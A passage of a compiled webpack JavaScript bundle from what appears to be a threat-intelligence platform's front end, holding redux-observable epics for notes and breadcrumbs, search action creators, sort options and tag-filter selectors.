 * NOTE: The findEntityRanges API is very strange (IMO). It takes a callback
 * which will be called with the range of the found entity. I.e. [number,
 * number] tuples. Two things:
 *
 * - why use a callback for a sync operation?
 * - what if, like me, you actually want the entities and not the ranges?
 *
 * This function solves those problems.
 */
var getMentionEntities = function getMentionEntities(contentState) {
  var results = [];
  var noop = function noop() {};

  contentState.getBlocksAsArray().forEach(function (block) {
    block.findEntityRanges(function (x) {
      var k = x.getEntity();
      var ent = k ? contentState.getEntity(k) : null;

      if (ent) {
        results.push(ent);
      }

      return false; // See NOTE
    }, noop);
  });

  return results;
};

var getMentions = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(getCurrentContent, getMentionEntities, Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["map"])(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['data', 'mention'])));

/**
 * NOTE: When loaded into a note for editing the mentions are not immutable,
 * therefore we need to use the get helper to ensure that getting the GUID
 * works. However, this is not ideal. We should not have multiple data sources
 * here. Deeper investigation will likely reveal what's happening and why the
 * data isn't always mapped to immutable.
 */
var getMentionGuids = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(getMentions, Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["tap"])(function (x) {
  // See NOTE
  if (!__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"].isMap(x)) {
    console.warn('Warning: Mentions are not immutable. Falling back to plain object getter.');
  }
}), Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["map"])(function (x) {
  return x.guid || x.get('guid');
}), __WEBPACK_IMPORTED_MODULE_4_ramda__["uniq"] // Remove duplicates. People can be tagged more than once
);

var getPlainText = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pipe"])(getCurrentContent, function (x) {
  return x.getPlainText();
});

var updateNoteEpic = function updateNoteEpic(action$, store, _ref16) {
  var ajax = _ref16.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["R" /* UPDATE_NOTE */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (_ref17) {
    var id = _ref17.id,
        initialId = _ref17.initialId,
        editorState = _ref17.editorState;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return ajax.putJSON(Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])() + '/annotations/' + id, {
        initialId: initialId,
        note: NoteIso.to(editorState),
        mentions: getMentionGuids(editorState),
        plainText: getPlainText(editorState)
      }).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(fromNoteResponse).map(function (payload) {
        return {
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["T" /* UPDATE_NOTE_SUCCESS */],
          payload: payload
        };
      });
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["S" /* UPDATE_NOTE_FAILURE */],
        error: true,
        payload: err
      });
    });
  });
};

var saveNoteEpic = function saveNoteEpic(action$, store, _ref18) {
  var ajax = _ref18.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["F" /* SAVE_NOTE */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (_ref19) {
    var id = _ref19.id,
        editorState = _ref19.editorState;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return ajax.postJSON(Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])() + '/annotations/add', {
        initialId: id,
        note: NoteIso.to(editorState),
        mentions: getMentionGuids(editorState),
        plainText: getPlainText(editorState)
      }).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('response')).map(fromNoteResponse).map(function (payload) {
        return {
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["H" /* SAVE_NOTE_SUCCESS */],
          payload: payload
        };
      }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["G" /* SAVE_NOTE_FAILURE */],
          error: true,
          payload: err
        });
      });
    });
  });
};

var deleteNoteEpic = function deleteNoteEpic(action$, store, _ref20) {
  var ajax = _ref20.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["i" /* DELETE_NOTE */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (_ref21) {
    var guid = _ref21.guid,
        nodeGuid = _ref21.nodeGuid;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      return ajax.delete(Object(__WEBPACK_IMPORTED_MODULE_17__constants__["a" /* graphEndpoint */])() + '/annotations/' + guid).mapTo({
        type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["k" /* DELETE_NOTE_SUCCESS */],
        payload: { guid: guid, nodeGuid: nodeGuid },
        meta: {
          alert: { type: 'success', text: 'Note removed.' }
        }
      }).catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["j" /* DELETE_NOTE_FAILURE */],
          error: true,
          payload: err
        });
      });
    });
  });
};

var notesUrlBase = /^\/constellation\/reports/g;
var getNoteFromLocation = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['query', 'note']);

/**
 * Handle deep linking to a note. This involves checking the URL for a note UUID
 * ans setting state accordingly.
 */
var noteUrlHandlerEpic = function noteUrlHandlerEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_1_react_router_redux__["LOCATION_CHANGE"]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).filter(function (x) {
    return notesUrlBase.test(x.pathname) && getNoteFromLocation(x);
  }).map(getNoteFromLocation).switchMap(function (noteId) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({ type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["I" /* SET_ACTIVE_NOTE */], payload: noteId });
  });
};

var selectCurrentReportEpic = function selectCurrentReportEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["A" /* REPLACE_SELECTION */], __WEBPACK_IMPORTED_MODULE_16__action_types_js__["s" /* GO_TO_BREADCRUMB */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (id) {

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_14_modules_reports_action_types__["H" /* SET_CURRENT_ID */],
      payload: id
    }, { type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["D" /* RESET_HIGHLIGHT_NODE */], payload: id });
  });
};

var goToBreadcrumbEpic = function goToBreadcrumbEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["s" /* GO_TO_BREADCRUMB */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (id) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_16__action_types_js__["A" /* REPLACE_SELECTION */],
      payload: Array(id)
    });
  });
};

var formatNodeClickToBCrumb = function formatNodeClickToBCrumb(node) {
  var id = node.id,
      guid = node.guid,
      nodeType = node.nodeType,
      title = node.title,
      value = node.value,
      name = node.name,
      indicatorType = node.indicatorType,
      source = node.source;


  switch (nodeType) {
    case 'INDICATOR':
      return {
        id: guid,
        nodeType: nodeType,
        title: value,
        indicatorType: indicatorType,
        source: source
      };
    case 'INDICATOR_TAG':
      return {
        id: guid,
        nodeType: nodeType.replace(/_/g, ' '), // Humanize INDICATOR_TAG
        title: name,
        source: source
      };
    default:
      // Default is reports
      return {
        id: id,
        title: title,
        nodeType: nodeType,
        source: source
      };
  }
};
var updateBreadcrumbEpic = function updateBreadcrumbEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["v" /* NODE_CLICKED */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).mergeMap(function (node) {

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_20__action_types__["a" /* ADD_BREADCRUMB */],
      payload: formatNodeClickToBCrumb(node)
    });
  });
};

var initBreadcrumbEpic = function initBreadcrumbEpic(action$) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_16__action_types_js__["r" /* FETCH_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('data')).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('nodes')).mergeMap(function (graphNodes) {
    var rootNode = graphNodes[0];
    return rootNode ? __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
      type: __WEBPACK_IMPORTED_MODULE_20__action_types__["a" /* ADD_BREADCRUMB */],
      payload: formatNodeClickToBCrumb(rootNode)
    }) : __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_redux_observable__["combineEpics"])(fetchEpic, fetchExplosionEpic, deleteCurrentSelectionEpic, toggleActiveFilterEpic, cacheGraphSimulationEpic, redirectOnRemoveEpic, undoEpic, redoEpic, resetEpic, exportIndicatorsEpic, whitelistSyncEpic, updateNoteEpic, saveNoteEpic, processNotesEpic, deleteNoteEpic, fetchAnnotationsEpic, noteUrlHandlerEpic, selectCurrentReportEpic, updateBreadcrumbEpic, goToBreadcrumbEpic, initBreadcrumbEpic));

/***/ }),
/* 1386 */,
/* 1387 */,
/* 1388 */,
/* 1389 */,
/* 1390 */,
/* 1391 */,
/* 1392 */,
/* 1393 */,
/* 1394 */,
/* 1395 */,
/* 1396 */,
/* 1397 */,
/* 1398 */,
/* 1399 */,
/* 1400 */,
/* 1401 */,
/* 1402 */,
/* 1403 */,
/* 1404 */,
/* 1405 */,
/* 1406 */,
/* 1407 */,
/* 1408 */,
/* 1409 */,
/* 1410 */,
/* 1411 */,
/* 1412 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sortOptions", function() { return sortOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sorterValues", function() { return sorterValues; });
var sortOptions = [{
  text: 'Newest to Oldest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'DESC'
  }
}, {
  text: 'Oldest to Newest Updated',
  sort: {
    sortBy: 'updated',
    sortDirection: 'ASC'
  }
}, {
  text: 'Value (A-Z)',
  sort: {
    sortBy: 'indicator.value',
    sortDirection: 'ASC'
  }
}, {
  text: 'Value (Z-A)',
  sort: {
    sortBy: 'indicator.value',
    sortDirection: 'DESC'
  }
}, {
  text: 'Whitelisted By (A-Z)',
  sort: {
    sortBy: 'whitelistedBy',
    sortDirection: 'ASC'
  }
}, {
  text: 'Whitelisted By (Z-A)',
  sort: {
    sortBy: 'whitelistedBy',
    sortDirection: 'DESC'
  }
}];

var sorterValues = {
  searchSorterPlaceholder: 'Select',
  searchSorters: sortOptions[0]
};

/***/ }),
/* 1413 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "COMPANY_ENDPOINT", function() { return COMPANY_ENDPOINT; });
var COMPANY_ENDPOINT = '/services/company';

/***/ }),
/* 1414 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetSearch", function() { return resetSearch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setSearchTerm", function() { return setSearchTerm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setSearchOptions", function() { return setSearchOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "triggerSearch", function() { return triggerSearch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchIOCs", function() { return fetchIOCs; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchReports", function() { return fetchReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateReportFilters", function() { return updateReportFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearReportFilters", function() { return clearReportFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "executeReportQuery", function() { return executeReportQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateEntityFilters", function() { return updateEntityFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearEntityFilters", function() { return clearEntityFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "executeEntityQuery", function() { return executeEntityQuery; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setViewPanel", function() { return setViewPanel; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "executeSearch", function() { return executeSearch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateSearchPageFilters", function() { return updateSearchPageFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearSearchPageFilters", function() { return clearSearchPageFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__ = __webpack_require__(180);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_form_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types__ = __webpack_require__(905);





/* Reset search form */
var resetSearch = function resetSearch() {
  return Object(__WEBPACK_IMPORTED_MODULE_1_redux_form_immutable__["reset"])('search');
};

/**
 * NOTE: It's important to default to an empty string b/c if we pass undefined
 * in the dispatch the store will throw an error, saying an actual value must be
 * returned.
 */
var setSearchTerm = function setSearchTerm() {
  var search = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["r" /* SET_SEARCH_TERM */],
    payload: search
  };
};

var setSearchOptions = function setSearchOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["q" /* SET_SEARCH_OPTIONS */],
    payload: options
  };
};

/* Trigger a search: url path will be udpated */
var triggerSearch = function triggerSearch() {
  var search = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["t" /* TRIGGER_SEARCH */],
    payload: search
  };
};

/* Search for IOCs directly, accepts searchDto parameters.
 * Used for pagination of IOC results. */
var fetchIOCs = function fetchIOCs(searchDto) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* FETCH_IOCS */],
    payload: searchDto
  };
};

/* Search for Reports directly, accepts searchDto parameters.
 * Used for pagination of Report results. */
var fetchReports = function fetchReports(searchDto) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["j" /* FETCH_REPORTS */],
    payload: searchDto
  };
};

// Search 2.0
var updateReportFilters = function updateReportFilters(payload, fields, dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["v" /* UPDATE_REPORT_PAGE_FILTERS */],
    payload: payload,
    fields: fields,
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

// Resets report query payload to its default state
var clearReportFilters = function clearReportFilters(dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* CLEAR_REPORT_SEARCH_FILTERS */],
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

var executeReportQuery = function executeReportQuery(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["e" /* EXECUTE_REPORTS_SEARCH */],
    payload: payload
  };
};

var updateEntityFilters = function updateEntityFilters(payload, fields, dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["u" /* UPDATE_ENTITY_PAGE_FILTERS */],
    payload: payload,
    fields: fields,
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

// Resets entity query payload to its default state
var clearEntityFilters = function clearEntityFilters(dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* CLEAR_ENTITY_SEARCH_FILTERS */],
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

var executeEntityQuery = function executeEntityQuery(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* EXECUTE_ENTITIES_SEARCH */],
    payload: payload
  };
};

/* Sets view panel for search results: ALL | ENTITIES | REPORTS */
var setViewPanel = function setViewPanel(panel) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["s" /* SET_VIEW_PANEL */],
    payload: panel
  };
};

/* This will trigger a global search: i.e. IOCs and reports will be fetched */
var executeSearch = function executeSearch(search) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["f" /* EXECUTE_SEARCH */],
    payload: search
  };
};

var updateSearchPageFilters = function updateSearchPageFilters(payload, fields, dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["w" /* UPDATE_SEARCH_PAGE_FILTERS */],
    payload: payload,
    fields: fields,
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

var clearSearchPageFilters = function clearSearchPageFilters(dispatchSearchAfterUpdate) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["c" /* CLEAR_SEARCH_PAGE_FILTERS */],
    dispatchSearchAfterUpdate: dispatchSearchAfterUpdate
  };
};

/***/ }),
/* 1415 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "attributes", function() { return attributes; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "enclaveTags", function() { return enclaveTags; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorTags", function() { return indicatorTags; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "modalOpen", function() { return modalOpen; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "indicatorTagsList", function() { return indicatorTagsList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "includedTagNameSetReports", function() { return includedTagNameSetReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "includedTagNameSetIndicators", function() { return includedTagNameSetIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "excludedTagNameSetReports", function() { return excludedTagNameSetReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "excludedTagNameSetIndicators", function() { return excludedTagNameSetIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "includedTagOptionsReports", function() { return includedTagOptionsReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "includedTagOptionsIndicators", function() { return includedTagOptionsIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "excludedTagOptionsReports", function() { return excludedTagOptionsReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "excludedTagOptionsIndicators", function() { return excludedTagOptionsIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allTagOptionsReports", function() { return allTagOptionsReports; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allTagOptionsEntities", function() { return allTagOptionsEntities; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "allTagOptionsSearch", function() { return allTagOptionsSearch; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_reports_getters__ = __webpack_require__(215);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_modules_indicators_getters__ = __webpack_require__(300);







var attributes = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['tags', 'attributes']);
var enclaveTags = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['tags', 'enclaveTags']);
var indicatorTags = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['tags', 'indicatorTags']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['tags', 'loading']);
var modalOpen = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['tags', 'modalOpen']);

// Search 2.0, we use the query payloads as the keeper of our tags
var reportsFilterTags = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['search', 'reportPageQuery', 'tagFilters']);
var entityFilterTags = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["getterFromKeyPath"])(['search', 'entityPageQuery', 'tagFilters']);

/* This reduces the indicatorsTags getter value above of <enclaveId, tags[]>
 * to a list of all tags (tags[]), for use in the tags filter getters below
 */
var indicatorTagsList = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(indicatorTags, function (tags) {
  return tags.reduce(function (tagList, tagSet) {
    return tagList.concat(tagSet.toList());
  }, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])());
});

/* NOTE: About tags for filtering reports list by tag: (︶︿︶)
 *
 * Right now there can be multiple enclave tags with the same name.
 * We de-duplicate the tags list here and treat the tags as if the name
 * is the uniquely identifying element. This is mainly because from the server
 * perspective it will return all tags of a given name, so although this is a
 * little strange now it is consistent with the current server behavior.
 *
 * NOTE: These getters provide the tag options for reports and indicators.
 * Because the logic is the same and the data objects are the same shape, the
 * operations here are shared for both.
 *
 **/

/* De-duplicate tags based on name, i.e. remove repreated names */
var deDeuplicateTagsByName = function deDeuplicateTagsByName(tags) {
  var nameSet = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])();
  return tags.reduce(function (tags, tag) {
    if (!nameSet.has(tag.get('name'))) {
      nameSet = nameSet.add(tag.get('name'));
      return tags.set(tag.get('guid'), tag);
    }
    return tags;
  }, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])());
};

/*
 * Calculations for sets of currently included and excluded tag names
 */
var includedNameSet = function includedNameSet(options) {
  return options.get('tags').map(function (tag) {
    return tag.get('name');
  }).toSet();
};

var includedTagNameSetReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_3_modules_reports_getters__["displayOptions"], includedNameSet);
var includedTagNameSetIndicators = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_4_modules_indicators_getters__["fetchParams"], includedNameSet);

var excludedNameSet = function excludedNameSet(options) {
  return options.get('excludedTags').map(function (tag) {
    return tag.get('name');
  }).toSet();
};

var excludedTagNameSetReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_3_modules_reports_getters__["displayOptions"], excludedNameSet);
var excludedTagNameSetIndicators = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_4_modules_indicators_getters__["fetchParams"], excludedNameSet);

/*
 * Calculations for included and excluded tag options
 */
var includedTagOptions = function includedTagOptions(tags, excludedTags) {
  return deDeuplicateTagsByName(tags).filter(function (tag) {
    return !excludedTags.has(tag.name);
  }).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]);
};

var includedTagOptionsReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([enclaveTags, excludedTagNameSetReports], includedTagOptions);

var includedTagOptionsIndicators = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([indicatorTagsList, excludedTagNameSetIndicators], includedTagOptions);

var excludedTagOptions = function excludedTagOptions(tags, activeTags) {
  return deDeuplicateTagsByName(tags).filter(function (tag) {
    return !activeTags.has(tag.name);
  }).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]);
};

var excludedTagOptionsReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([enclaveTags, includedTagNameSetReports], excludedTagOptions);

var excludedTagOptionsIndicators = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([indicatorTagsList, includedTagNameSetIndicators], excludedTagOptions);

// Search 2.0
var mergeTagOptions = function mergeTagOptions(includedTags, excludedTags, existingTags) {
  if (existingTags) {
    // If you provide an existing query object, it will filter out the already selected tag options
    var existingIncludedTags = existingTags.get('included');
    var existingExcludedTags = existingTags.get('excluded');
    return {
      included: includedTags.toSet().subtract(existingExcludedTags).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]),
      excluded: excludedTags.toSet().subtract(existingIncludedTags).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"])
    };
  }

  return {
    included: includedTags.toSet().sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]),
    excluded: excludedTags.toSet().sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"])
  };
};

var allTagOptionsReports = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([includedTagOptionsReports, excludedTagOptionsReports, reportsFilterTags], mergeTagOptions);

var allTagOptionsEntities = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([includedTagOptionsIndicators, excludedTagOptionsIndicators, entityFilterTags], mergeTagOptions);

// Show all possible tag options on the search page, the filtering will be handled
var allTagOptionsSearch = Object(__WEBPACK_IMPORTED_MODULE_2_reselect__["createSelector"])([allTagOptionsReports, allTagOptionsEntities], function () {
  var reportTags = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : { included: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(), excluded: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])() };
  var entitiesTags = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : { included: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(), excluded: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])() };


  return {
    included: reportTags.included.union(entitiesTags.included).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"]),
    excluded: reportTags.excluded.union(entitiesTags.excluded).sort(__WEBPACK_IMPORTED_MODULE_1_trustar_utils__["alphabetize"])
  };
});
// End Search 2.0

/***/ }),
/* 1416 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return formatSearchRequest; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router_redux__ = __webpack_require__(100);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router_redux___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_react_router_redux__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__action_types__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9_modules_reports_utils__ = __webpack_require__(509);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__constants__ = __webpack_require__(761);
